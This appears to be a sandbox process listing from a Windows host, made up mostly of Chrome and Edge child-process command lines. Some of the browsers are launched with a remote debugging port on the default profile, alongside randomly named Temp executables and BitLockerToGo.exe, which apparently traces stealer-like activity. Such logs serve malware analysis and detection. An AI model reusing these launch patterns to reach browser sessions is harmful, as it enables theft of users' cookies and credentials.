C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3872,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4484 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4308 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4232,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4792 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4752,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4988 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4768,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4772 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x178,0x17c,0x180,0x154,0x184,0x7ffd9e4746f8,0x7ffd9e474708,0x7ffd9e474718

C:\Users\Admin\AppData\Local\Temp\10097360101\91959916b2.exe

"C:\Users\Admin\AppData\Local\Temp\10097360101\91959916b2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2256 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2392 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2392 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3796 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3180 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd9e4746f8,0x7ffd9e474708,0x7ffd9e474718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2856 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2852 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2820 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3308 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3316 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3300 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4280 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4396 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10097370101\d3b455f478.exe

"C:\Users\Admin\AppData\Local\Temp\10097370101\d3b455f478.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd95aecc40,0x7ffd95aecc4c,0x7ffd95aecc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1984,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1980 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1844,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2108 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2300,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2512 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3404 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3676,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4556 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4576,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4716 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4672,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3660 /prefetch:8

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4436,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4964 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4856,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5016 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5164,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5144 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5232 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5220,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5364,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5372 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe

C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe

